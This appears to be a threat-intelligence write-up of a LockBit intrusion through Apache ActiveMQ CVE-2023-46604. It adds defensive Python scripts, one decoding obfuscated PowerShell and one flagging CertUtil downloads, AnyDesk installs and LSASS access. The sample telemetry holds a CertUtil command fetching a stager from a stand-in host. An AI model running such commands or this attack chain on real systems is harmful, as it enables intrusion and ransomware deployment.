Threat actors have actively exploited a critical vulnerability in Apache ActiveMQ, resulting in the full deployment of LockBit ransomware across an enterprise network. Using the ActiveMQ messaging broker's remote code execution vulnerability, CVE-2023-46604, the attackers gained access to an exposed Windows server and later used Remote Desktop Protocol during the encryption phase. The intrusion took about 19 calendar days from initial access to complete encryption.

The attack started in mid-February 2024, when a threat actor sent a specially crafted OpenWire command to a publicly exposed Apache ActiveMQ server.

The exploit made the server load a remote Java Spring XML configuration file that instructed the compromised host to use the Windows CertUtil tool to download a Metasploit stager. Once executed, the stager established a command-and-control channel to an attacker-controlled server at 166.62.100[.]52.

Figure: LSASS credential dumping activity seen in Sysmon logs during rounds 1 and 2 (Source: The DFIR Report)

On day 18, the attackers returned and used the service account they had stolen to remotely launch services and execute Metasploit payloads on several servers and domain controllers.

String concatenation, Base64 encoding, and gzip compression were used in combination to obfuscate the PowerShell commands that carried those payloads.

Once decoded, the shellcode used VirtualAlloc to allocate memory regions, VirtualProtect to change their protection to executable, and then spawned a thread to run the injected payload in memory. This technique is frequently used to evade signature-based endpoint detection. The activity was detected and stopped on hosts with Microsoft Defender installed; unprotected systems were completely compromised.
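The two paragraphs above describe the layering an analyst has to undo before the in-memory loader is visible: string concatenation to split API names, then Base64 and gzip around the whole command. The following script is an added example written for this article, not code from The DFIR Report or from the attackers; it peels gzip/Base64/UTF-16LE layers from a captured PowerShell argument, collapses `'Vir'+'tual'+'Alloc'` style concatenation, and reports which injection-related Win32 API names remain. The sample blob it decodes is constructed from a harmless script, and the API name list is an assumed starting set, not one the report publishes.

```python
import base64
import binascii
import gzip
import re
import zlib

# Win32 APIs the decoded loader in the report used for in-memory execution;
# seeing them in a decoded script is a strong injection indicator (assumed list).
INJECTION_APIS = ("VirtualAlloc", "VirtualProtect", "CreateThread", "WriteProcessMemory")
GZIP_MAGIC = b"\x1f\x8b"


def looks_like_text(data: bytes) -> bool:
    """True if data is another gzip layer or decodes to printable UTF-8/UTF-16LE."""
    if data[:2] == GZIP_MAGIC:
        return True
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return True
    return False


def try_base64(data: bytes):
    """Decode one Base64 layer, or return None if data is not Base64 text."""
    cleaned = re.sub(rb"\s+", b"", data)
    if not cleaned or len(cleaned) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+=*", cleaned):
        return None
    try:
        decoded = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None
    return decoded if looks_like_text(decoded) else None


def try_gzip(data: bytes):
    """Decompress one gzip layer, or return None if data is not gzip."""
    if data[:2] != GZIP_MAGIC:
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def decode_layers(blob: bytes, max_layers: int = 10):
    """Peel gzip/Base64 layers until plain script text remains.
    Returns (script_text, names of the layers removed, in order)."""
    layers, data = [], blob
    for _ in range(max_layers):
        out = try_gzip(data)
        if out is not None:
            layers.append("gzip"); data = out; continue
        out = try_base64(data)
        if out is not None:
            layers.append("base64"); data = out; continue
        break
    # powershell -EncodedCommand takes UTF-16LE: ASCII text then has a NUL in every odd byte
    if len(data) >= 4 and data[1:2] == b"\x00" and data[3:4] == b"\x00":
        layers.append("utf-16le")
        return data.decode("utf-16-le", errors="replace"), layers
    return data.decode("utf-8", errors="replace"), layers


def collapse_concat(script: str) -> str:
    """Join 'Vir' + 'tual' + 'Alloc' style concatenation so split API names reappear."""
    return re.sub(r"""['"]\s*\+\s*['"]""", "", script)


def scan_indicators(script: str):
    """Return the injection-related API names present once concatenation is collapsed."""
    collapsed = collapse_concat(script)
    return [api for api in INJECTION_APIS if api in collapsed]


def analyze(blob: bytes) -> dict:
    script, layers = decode_layers(blob)
    return {"layers": layers, "script": script, "indicators": scan_indicators(script)}


# Constructed sample (not the attackers' payload): a harmless script whose API names
# are split by concatenation, then gzip-compressed and Base64-encoded, the same
# layering the report describes.
SAMPLE_SCRIPT = "$a = 'Vir' + 'tual' + 'Alloc'; $b = 'VirtualProtect'; Write-Host 'constructed sample'"
SAMPLE_BLOB = base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode("utf-8")))
# Constructed -EncodedCommand style argument (UTF-16LE, then Base64).
SAMPLE_ENCODED_COMMAND = base64.b64encode("Write-Host 'constructed'".encode("utf-16-le"))

if __name__ == "__main__":
    for blob in (SAMPLE_BLOB, SAMPLE_ENCODED_COMMAND):
        print(analyze(blob))
```

The decoder accepts a Base64 layer only when the result is either another gzip layer or printable text, which keeps short alphanumeric commands such as `calc` from being misread as Base64. Feed it the argument string from a process-creation event or a PowerShell ScriptBlock log entry; the returned `layers` list doubles as a quick obfuscation-depth metric for triage.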

Figure: Installing AnyDesk silently and connecting C2 to 166.62.100[.]52 (Source: The DFIR Report)

To keep a foothold while hiding their tracks, the attackers covertly installed AnyDesk, configured as an auto-start service on the beachhead host.
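Each stage of the intrusion described on this page leaves a process-creation or process-access record that Sysmon-style telemetry captures: java.exe (the ActiveMQ broker) spawning CertUtil with a URL, AnyDesk installed with its silent and auto-start switches, services.exe launching encoded PowerShell on the day-18 return, and an unexpected process opening LSASS. The following triage script is an added example written for this article, not tooling from The DFIR Report; the events it runs over are constructed, the hostnames, paths, timestamps and the `c2.example.invalid` URL are placeholders, the LSASS allowlist is an assumed starting set to tune per estate, and the AnyDesk switches (`--install`, `--start-with-win`, `--silent`) are taken from AnyDesk's command-line installer as the author understands it.

```python
import base64
import re
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Event:
    """Minimal Sysmon-style record: ID 1 = process create, ID 10 = process access."""
    ts: str                      # ISO 8601 timestamp
    event_id: int
    host: str
    image: str = ""              # created process (ID 1) or source process (ID 10)
    parent_image: str = ""       # ID 1 only
    command_line: str = ""       # ID 1 only
    target_image: str = ""       # ID 10 only
    granted_access: str = "0x0"  # ID 10 only, hex access mask


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def activemq_certutil_download(e: Event) -> bool:
    # ActiveMQ runs under java.exe, which has no business launching CertUtil with a URL
    return (e.event_id == 1 and basename(e.image) == "certutil.exe"
            and basename(e.parent_image) == "java.exe"
            and re.search(r"urlcache|https?://", e.command_line, re.I) is not None)


def service_launched_encoded_powershell(e: Event) -> bool:
    # Remote service creation shows up as services.exe spawning PowerShell carrying
    # an -EncodedCommand blob or an inline Base64/gzip decoder
    pattern = r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}|FromBase64String|GzipStream"
    return (e.event_id == 1 and basename(e.parent_image) == "services.exe"
            and basename(e.image) in ("powershell.exe", "pwsh.exe")
            and re.search(pattern, e.command_line, re.I) is not None)


def anydesk_silent_install(e: Event) -> bool:
    return (e.event_id == 1 and basename(e.image) == "anydesk.exe"
            and re.search(r"--install|--start-with-win|--silent", e.command_line, re.I) is not None)


# Processes that legitimately read LSASS on this (constructed) estate; tune per environment
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
PROCESS_VM_READ = 0x0010


def lsass_credential_access(e: Event) -> bool:
    if e.event_id != 10 or basename(e.target_image) != "lsass.exe":
        return False
    if basename(e.image) in LSASS_ALLOWLIST:
        return False
    try:
        mask = int(e.granted_access, 16)
    except ValueError:
        return False
    return bool(mask & PROCESS_VM_READ)  # reading LSASS memory is what dumping needs


RULES = (activemq_certutil_download, service_launched_encoded_powershell,
         anydesk_silent_install, lsass_credential_access)


def triage(events):
    """Return (rule_name, event) pairs for every event matching a rule, in input order."""
    return [(rule.__name__, e) for e in events for rule in RULES if rule(e)]


def span_days(hits) -> int:
    """Calendar days between the first and last alerted event (a dwell-time estimate)."""
    times = [datetime.fromisoformat(e.ts) for _, e in hits]
    return (max(times) - min(times)).days if times else 0


# Constructed telemetry: the blob is harmless text, the hosts and paths are invented.
_ENC = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event("2024-02-14T03:12:00", 1, "amq-srv01",
          image=r"C:\Windows\System32\certutil.exe",
          parent_image=r"C:\Program Files\Java\jre\bin\java.exe",
          command_line=r"certutil.exe -urlcache -split -f http://c2.example.invalid/stager.exe C:\Windows\Temp\s.exe"),
    Event("2024-02-14T03:40:00", 1, "amq-srv01",
          image=r"C:\Users\svc\AppData\Local\Temp\anydesk.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r'anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent'),
    Event("2024-02-15T09:00:00", 1, "ws-042",  # benign: explorer parent, no URL
          image=r"C:\Windows\System32\certutil.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line="certutil -hashfile image.iso SHA256"),
    Event("2024-03-02T10:05:00", 1, "dc01",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\System32\services.exe",
          command_line=f"powershell.exe -nop -w hidden -enc {_ENC}"),
    Event("2024-03-02T10:06:00", 10, "dc01",
          image=r"C:\Windows\Temp\m.exe",
          target_image=r"C:\Windows\System32\lsass.exe", granted_access="0x1010"),
    Event("2024-03-02T10:07:00", 10, "dc01",  # benign: allowlisted AV engine
          image=r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
          target_image=r"C:\Windows\System32\lsass.exe", granted_access="0x1010"),
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for name, e in hits:
        print(f"{e.ts} {e.host:<10} {name}")
    print("span:", span_days(hits), "days")
```

The parent-process condition is what makes the CertUtil rule precise: CertUtil is a legitimate admin tool, but a Java-hosted message broker launching it with a URL is the exploitation step itself. The `span_days` figure on the constructed events is 17 days between the beachhead and the domain-controller activity, the same order of dwell time the report describes, which is why alerting on the first rule matters far more than on the last.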